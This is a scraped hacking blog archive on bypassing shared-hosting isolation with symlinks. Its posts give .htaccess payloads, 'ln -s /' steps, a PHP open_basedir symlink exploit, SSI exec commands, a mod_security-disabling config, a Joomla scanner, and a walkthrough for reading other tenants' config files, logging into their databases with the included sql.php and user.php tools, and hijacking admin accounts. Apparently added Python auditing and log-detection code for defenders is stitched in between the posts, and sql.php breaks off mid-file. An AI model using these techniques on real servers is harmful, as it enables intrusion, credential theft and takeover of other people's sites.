Showing posts with label Symlink. Show all posts

Tuesday, 15 January 2013

HostGator, HostMonster priv8 bypass

first of all, create a directory called 'r4x' or anything.


create a .htaccess file within the server, and add this code to it.


Code:
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html


or...



Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html




OK, once you've done that, backconnect to the server, go to the following directory you created.

and type this command

"ln -s /"

done. server bypassed.


easy tip: just create an old symlink already in the server folder, then exchange the .htaccess files that I posted.

NOTE: if this method doesn't work, it may have been patched, don't blame me.

use knowledge for good
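For administrators of shared hosts, the combination described above (a tenant `.htaccess` that turns on symlink following and remaps `.php` away from the PHP handler, next to a symlink that leaves the tenant's tree) can be found by a filesystem audit. The following is an added example, not part of the original post: the function names, the finding labels and the sample directory layout are assumptions made here, and the `.htaccess` body is the one quoted above.

```python
import os
import tempfile

# .htaccess body quoted in the post above, used as constructed test input.
POST_HTACCESS = """Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
"""


def audit_htaccess(text):
    """Return the set of risky behaviours a .htaccess body switches on."""
    flags = set()
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive, args = parts[0].lower(), [a.lower() for a in parts[1:]]
        if directive == "options":
            # "-X" disables an option; bare "X" or "+X" enables it.
            # "All" enables every option except MultiViews.
            enabled = {a.lstrip("+") for a in args if not a.startswith("-")}
            if enabled & {"followsymlinks", "all"}:
                flags.add("follows-symlinks")
            if enabled & {"indexes", "all"}:
                flags.add("directory-listing")
        elif directive in ("addtype", "addhandler"):
            # First argument is the type or handler, the rest are extensions.
            # .php mapped to anything that is not a PHP handler is served as source.
            if args and "php" not in args[0] and {".php", "php"} & set(args[1:]):
                flags.add("php-remapped")
    return flags


def audit_tree(tenant_root):
    """Walk one tenant's document root and return sorted (kind, path, detail) findings."""
    root = os.path.realpath(tenant_root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        rel_dir = os.path.relpath(dirpath, root)
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if os.path.islink(path):
                target = os.path.realpath(path)
                # A link whose resolved target is not under the tenant root
                # reaches other accounts or system files.
                if os.path.commonpath([root, target]) != root:
                    findings.append(("symlink-escapes-tenant", rel, target))
            elif name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    flags = audit_htaccess(fh.read())
                if {"follows-symlinks", "php-remapped"} <= flags:
                    findings.append(
                        ("htaccess-source-disclosure", rel, ",".join(sorted(flags)))
                    )
    return sorted(findings)


def build_fixture(base):
    """Constructed sample tree: one directory laid out as in the post, one benign."""
    root = os.path.join(base, "home", "tenant", "public_html")
    neighbour = os.path.join(base, "home", "other", "public_html")
    os.makedirs(os.path.join(root, "sym"))
    os.makedirs(os.path.join(root, "assets", "img"))
    os.makedirs(neighbour)
    with open(os.path.join(root, "sym", ".htaccess"), "w") as fh:
        fh.write(POST_HTACCESS)
    # Link that leaves the tenant's own tree (stand-in for the link in the post).
    os.symlink(neighbour, os.path.join(root, "sym", "neighbour"))
    # Benign case: restrictive .htaccess and a link that stays inside the tree.
    with open(os.path.join(root, "assets", ".htaccess"), "w") as fh:
        fh.write("Options -Indexes -FollowSymLinks\n")
    os.symlink(os.path.join(root, "assets", "img"), os.path.join(root, "assets", "pics"))
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        for kind, rel, detail in audit_tree(build_fixture(base)):
            print(f"{kind:28} {rel:20} {detail}")
```

On Apache the matching hardening is `Options -FollowSymLinks +SymLinksIfOwnerMatch` on tenant directories, with `Options` and `FileInfo` left out of `AllowOverride` so that a tenant's `.htaccess` cannot switch these behaviours back on.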

PHP 5.3 SAFE MODE BYPASS (PHP SCRIPT) for SYMLINK

Usage:-
  1. Execute it.
  2. In a box, type /etc/passwd 
  3. Click on button Create Symlink.


Code:
<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
   exit;

if(!is_writable("."))
   die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
   if(!file_exists($fakedir))
       mkdir($fakedir);
   chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
   if(!empty($hardstyle[$a])){
       if(!file_exists($hardstyle[$a]))
           mkdir($hardstyle[$a]);
       chdir($hardstyle[$a]);
       $as++;
   }
}
$as++;
while($as--)
   chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
   if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
   else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>


Steps to symlink manually using user/passwd

1. We have a shell on a Linux server and Safe Mode is OFF; if it is not off, put the file php.ini, and Disable Functions: None

Code:
http://www.website.com/shell.php
and directory:

/home/ueb/public_html/
2. Create a directory and name it "r00t" from the shell, with this command in "Command Execution":

mkdir r00t

3. Now we have to go into the directory:

Code:
/home/ueb/public_html/r00t
4. We write this code in Notepad on our computer and save it as .htaccess; this allows us to make symlinks and read PHP files on the server:

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
We save the file as "All Files" and name it .htaccess

5. This .htaccess file is uploaded to the server, into the directory "r00t"; we do this with the Upload option of the shell.
We make sure that we upload .htaccess into the root directory and not into other directories like /home/ueb/public_html/ !

6. After that, we type this command in the shell:

Code:
ln -s / root
With this we create a symlink to the root of the server.

7. Now we see what we have done:

Code:
http://website.com/r00t/root/
Here we see the root of the server! Now we go into /home and see the users and other things; we can take control of other websites that are on the same server where we have the shell. If the /home directory shows Forbidden, then change the URL like this:

Code:
http://website.com/r00t/root/home/uebiob...ublic_html
Now see the files in the target!
Click on the document that has the configuration

Code:
website..com/r00t/root/home/uebiobjektiv/public_html/install.php

enjoy hacking....
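Seen from the server's side, the browsing steps above leave a recognisable trail in the access log. The following is an added example, not part of the original post: it flags successful requests whose URL exposes the `/home/<account>/public_html` layout, and requests where a known configuration file returns a non-empty body. The log lines, account names and the non-empty-body heuristic are assumptions made here; the file names are taken from the list further down this page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Configuration file names listed on this page, lower-cased.
CONFIG_NAMES = {
    "config.php", "conf_global.php", "settings.php", "configuration.php",
    "configuration.php-dist", "wp-config.php", "configure.php", "e107_config.php",
}

# Common/combined log format: client, identity, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A server filesystem layout showing up inside a URL path.
FS_LAYOUT_RE = re.compile(r"/home/([^/]+)/public_html(?:/|$)")

# Constructed sample log lines (documentation IP ranges, made-up accounts).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Aug/2012:10:01:02 +0000] "GET /sym/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2012:10:01:03 +0000] "GET /sym/root/home/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2012:10:01:04 +0000] "GET /sym/root/home/acct1/public_html/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2012:10:01:05 +0000] "GET /sym/root/home/acct1/public_html/wp-config.php HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Aug/2012:10:02:00 +0000] "GET /wp-config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.20 - - [25/Aug/2012:10:02:01 +0000] "GET /index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2012:10:03:00 +0000] "GET /sym/acct2/configuration.php HTTP/1.1" 200 1874 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return a hit dict for a suspicious successful request, else None."""
    m = LOG_RE.match(line)
    if m is None or m["status"] != "200":
        return None
    path = unquote(urlsplit(m["target"]).path)
    size = 0 if m["size"] == "-" else int(m["size"])
    reasons, account = [], None

    layout = FS_LAYOUT_RE.search(path)
    if layout:
        # The document root is serving a path that mirrors the host filesystem.
        account = layout.group(1)
        reasons.append("fs-layout-in-url")

    # Heuristic (assumption): an executed configuration file prints nothing,
    # so a 200 with a body suggests its source text was returned instead.
    if path.rsplit("/", 1)[-1].lower() in CONFIG_NAMES and size > 0:
        reasons.append("config-body-returned")

    if not reasons:
        return None
    return {"ip": m["ip"], "path": path, "account": account, "reasons": reasons}


def detect(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


def accounts_by_client(hits):
    """Map each client IP to the hosting accounts whose paths it reached."""
    seen = defaultdict(set)
    for hit in hits:
        if hit["account"]:
            seen[hit["ip"]].add(hit["account"])
    return {ip: sorted(accounts) for ip, accounts in seen.items()}


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG.splitlines())
    for hit in hits:
        print(hit["ip"], hit["path"], ",".join(hit["reasons"]))
    print(accounts_by_client(hits))
```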

Shtml Bypass Symlink - via 404 Error

OK, now I'm going to show you how we can bypass symlink using Server Side Includes.

Ok lets start,
For this method we need to find a server on the Server Side Includes. 

Code:
cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com


Now we come shtml file using a command will run ourselves
Code:
<!--#exec cmd="more xferlog.*|grep victim.com" -->


For example, the symlink.
ln -s /home/...../public_html/config.php config.txt
Come face to face.
Code:
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->


I'll run the script that I wrote that I do not think that hatches from Litespeed.

Now we come to read config.txt file in a shtml file I create and use the following.
Code:
<!--#include virtual="config.txt" -->


So far so error 404 
.htaccess
Code:
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml


Done!

This method mostly works on LiteSpeed Web Server.

Bypass Symlink

=============================================
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:


then symlink with this command:


ln -s /home/user/public_html/config.php config.ini


you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
====================================================


.htaccess file:


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm


============================================================

Bypass Symlink 403 (forbidden) on litespeed


edit .htaccess to bypass the





Code:
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Tuesday, 28 August 2012

Joomla Mass Scanner

Usage :

Code:
python joomla-mass.py <site> <options>
[options]
-p/-proxy <host:port> : Add proxy support
-404 : Won't show 404 responses
Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080
Script:
Code:
#!usr/bin/python

print"####################################################"
print"# Joomla Mass Scanner Vulnerability                #"
print"# Coded By Angel Injection                         #"
print"# Copyright 2011-2012                              #"
print"# http://www.1337day.com , http://www.r00tw0rm.com #"
print"####################################################"

import sys, re, httplib, time, socket

def main(path):
 try:
  if proxy != 0:
   h.putrequest("GET", "http://"+host+"/"+path)
  else:
   h.putrequest("HEAD", path)
  h.putheader("Host", host)
  h.endheaders()
  status, reason, headers = h.getreply()
  return status, reason
 except(), msg: 
  print "Error Occurred:",msg
  pass

def timer():
 now = time.localtime(time.time())
 return time.asctime(now)


if len(sys.argv) < 2 or len(sys.argv) > 5:
 print "\nUsage: python joomla-mass.py <site> <options>"
 print "\t[options]"
 print "\t   -p/-proxy <host:port> : Add proxy support"
 print "\t   -404 : Won't show 404 responses"
 print "Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080\n"

Htaccess Bypass Symlink


Hi Guys :X

This Htaccess Is For Bypass Symlink... 
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
 

Saturday, 25 August 2012

Symlink Full TuT

Hello guys, this is Maher Bro. Today I will explain how the symlinking process goes step by step, in two different methods.

#First Method:-
After uploading the shell make a new directory by an option or execute this command:

Quote:mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
  AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
as you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
[Image: kaoknd.png]
Then, execute this command:
Quote:ln -s / root
so now in our directory "sym" we have the ".htaccess" and something like this [root] (which is a symlink to the root directory, /)
and it will look like this:
[Image: 15g9qx4.png]
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
[Image: 4l6fv.png]
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html

#Of course replace =>(user) with the target website user.
you will see something like this:
[Image: mr8mrb.png]
the user in that picture is "hillock"
now you will be able to browse that site's files.
but we are looking for a specific file called "config.php" or "configuration.php"; some websites use a different name, but those are the most common ones.
here are some famous web apps with their configuration file locations:

Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

so after you find the configuration file, you will look for the DB user and password; for example, the picture below shows a Joomla! configuration file and I've selected the info we look for:
[Image: 14abedw.png]
after that, download sql.php from the attachments and upload it through your shell
then copy the login info from the configuration file and sign in to sql.php
when you sign in, it will look something like this:
[Image: 14jnjfl.png]
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configuration file from the same site; instead we symlink it to our victim's site as a .txt file. Let's see how to do it!
for this method you don't need to symlink the root directory (/); you symlink the target website's public_html instead
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php
#Finally symlink the target website with this command:
Quote:ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
[Image: 14v192q.png]
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configuration file! and then do the same as in the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
hope you liked it! 
User.php
PHP Code:
<?
echo "<title>Priv8 # Domains & Users</title>
<style>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
</style>
<p align=center># Domains & Users</p>
<p align=center>by Priv8 </p>
<center>";

$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }

echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";

foreach($d0mains as $d0main){

if(eregi("zone",$d0main)){

preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();

}}}

echo "</table>
<p align='center'> Priv8
</p>
";

?>
Sql.php
PHP Code:
<?
/*
 * MySQL Web Interface By JIKo
 * -------------------------------
 * Developed By sNiper_hEx
*/

if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
} else {
    $onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
    @extract($HTTP_SERVER_VARS, EXTR_SKIP);
    @extract($HTTP_COOKIE_VARS, EXTR_SKIP);
    @extract($HTTP_POST_FILES, EXTR_SKIP);
    @extract($HTTP_POST_VARS, EXTR_SKIP);
    @extract($HTTP_GET_VARS, EXTR_SKIP);
    @extract($HTTP_ENV_VARS, EXTR_SKIP);
}

function logon() {
    global $PHP_SELF;

    setcookie( "mysql_web_admin_username" );
    setcookie( "mysql_web_admin_password" );
    setcookie( "mysql_web_admin_hostname" );
    echo "<html>\n";
    echo "<head>\n";
    echo "<title>MySQL New by jiko</title>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<table width=100% height=100%><tr><td><center>\n";
    echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
    echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
    echo "<h1>MySQL Web by jiko</h1>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=logon_submit>\n";
    echo "<table cellpadding=5 cellspacing=1>\n";
    echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
    echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
    echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
    echo "</table><p>\n";
    echo "<input type=submit value='Enter'>\n";
    echo "<input type=reset value='Clear'><br>\n";
    echo "</form>\n";
    echo "</center></td></tr></table>\n";
    echo "</center></td></tr></table>\n";
    echo "<p><hr width=300>\n";
    echo "</center></td></tr></table>\n";
    echo "</body>\n";
    echo "</html>\n";
}

function logon_submit() {
    global $username, $password, $hostname ,$PHP_SELF;
    if($hostname =='')
        $hostname = 'localhost';
    setcookie( "mysql_web_admin_username", $username );
    setcookie( "mysql_web_admin_password", $password );
    setcookie( "mysql_web_admin_hostname", $hostname );
    echo "<html>";
    echo "<head>";
    echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
    echo "</head>";
    echo "</html>";
}

function echoQueryResult() {
    global $queryStr, $errMsg;

    if( $errMsg == "" ) $errMsg = "Success";
    if( $queryStr != "" ) {
        echo "<table cellpadding=5>\n";
        echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
        echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
        echo "</table><p>\n";
    }
}

function listDatabases() {
    global $mysqlHandle, $PHP_SELF;

    echo "<h1>Databases List</h1>\n";

    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createDB>\n";
    echo "<input type=text name=dbname>\n";
    echo "<input type=submit value='Create Database'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    echo "<table cellspacing=1 cellpadding=5>\n";

    $pDB = mysql_list_dbs( $mysqlHandle );
    $num = mysql_num_rows( $pDB );
    for( $i = 0; $i < $num; $i++ ) {
        $dbname = mysql_dbname( $pDB, $i );
        echo "<tr>\n";
        echo "<td>$dbname</td>\n";
        echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";
}

function createDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_create_db( $dbname, $mysqlHandle );
    listDatabases();
}

function dropDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_drop_db( $dbname, $mysqlHandle );
    listDatabases();
}

function listTables() {
    global $mysqlHandle, $dbname, $PHP_SELF;


    echo "<h1>Tables List</h1>\n";
    echo "<p class=location>$dbname</p>\n";
    echoQueryResult();
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createTable>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text name=tablename>\n";
    echo "<input type=submit value='Create Table'>\n";
    echo "</form>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=query>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text size=120 name=queryStr>\n";
    echo "<input type=submit value='Query'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    $pTable = mysql_list_tables( $dbname );

    if( $pTable == 0 ) {
        $msg  = mysql_error();
        echo "<h3>Error : $msg</h3><p>\n";
        return;
    }
    $num = mysql_num_rows( $pTable );

    echo "<table cellspacing=1 cellpadding=5>\n";

    for( $i = 0; $i < $num; $i++ ) {
        $tablename = mysql_tablename( $pTable, $i );

        echo "<tr>\n";
        echo "<td>\n";
        echo "$tablename\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
        echo "</td>\n";
        echo "</tr>\n";
    }

    echo "</table>";
}

function createTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "CREATE TABLE $tablename ( no INT )";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    listTables();
}

function dropTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "DROP TABLE $tablename";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    listTables();
}

function viewSchema() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    echo "<h1>Table Schema</h1>\n";
    echo "<p class=location>$dbname > $tablename</p>\n";

    echoQueryResult();

    echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
    echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
    echo "<hr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    echo "<table cellspacing=1 cellpadding=5>\n";
    echo "<tr>\n";
    echo "<th>Field</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Null</th>\n";
    echo "<th>Key</th>\n";
    echo "<th>Default</th>\n";
    echo "<th>Extra</th>\n";
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";


    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        echo "<tr>\n";
        echo "<td>".$field["Field"]."</td>\n";
        echo "<td>".$field["Type"]."</td>\n";
        echo "<td>".$field["Null"]."</td>\n";
        echo "<td>".$field["Key"]."</td>\n";
        echo "<td>".$field["Default"]."</td>\n";
        echo "<td>".$field["Extra"]."</td>\n";
        $fieldname = $field["Field"];
        echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";

}

function manageField( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Field</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Field</h1>\n";
        $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
        $num = mysql_num_rows( $pResult );
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_array( $pResult );
            if( $field["Field"] == $fieldname ) {
                $fieldtype = $field["Type"];
                $fieldkey = $field["Key"];
                $fieldextra = $field["Extra"];
                $fieldnull = $field["Null"];
                $fielddefault = $field["Default"];
                break;
            }
        }
        $type = strtok( $fieldtype, " (,)\n" );
        if( strpos( $fieldtype, "(" ) ) {
            if( $type == "enum" | $type == "set" ) {
                $valuelist = strtok( " ()\n" );
            } else {
                $M = strtok( " (,)\n" );
                if( strpos( $fieldtype, "," ) )
                    $D = strtok( " (,)\n" );
            }
        }
    }

    echo "<p class=location>$dbname > $tablename</p>\n";
    echo "<form action=$PHP_SELF>\n";

    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addField_submit>\n";
    else if( $cmd == "edit" ) {
        echo "<input type=hidden name=action value=editField_submit>\n";
        echo "<input type=hidden name=old_name value=$fieldname>\n";
    }
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";

    echo "<h3>Name</h3>\n";
    echo "<input type=text name=name value=$fieldname><p>\n";
    echo '

<h3>Type</h3>

<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
